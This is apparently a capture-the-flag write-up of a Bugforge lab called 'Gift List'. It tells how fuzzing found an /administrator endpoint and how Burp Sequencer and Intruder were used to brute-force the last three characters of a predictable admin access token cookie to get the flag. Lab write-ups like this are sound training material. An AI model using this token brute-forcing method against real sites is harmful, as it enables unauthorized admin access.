Gift List

This was the second time yours truly had the chance to host a lab on Bugforge, this time there was a cookie that needed some brute forcing.

When we log in, the first obvious thing that we see is that the server hands out adminAccessTokens. Strange, but ok, why not.

Considering there is an adminAccessToken, that must mean that there is an admin endpoint right?

Best what we now can do is fuzz the application.

That's why /admin didn't work, the endpoint is /administrator, unfortunately, we get an access denied. When we go to the frontend, we'll see what we feared, the adminAccessToken isn't good. Now let's investigate that token. We send the login request to Sequencer and let it do it's magic.

Sequencer tells us that only the three last characters change, and if we check this manually, this pans out. So now we go to Intruder and Brute Force the token.

With the brute force, you'll see that on suffix rls you get a different response length.

When we now put that adminAccessToken in our cookies and refresh the page.

We get the flag 🇧🇪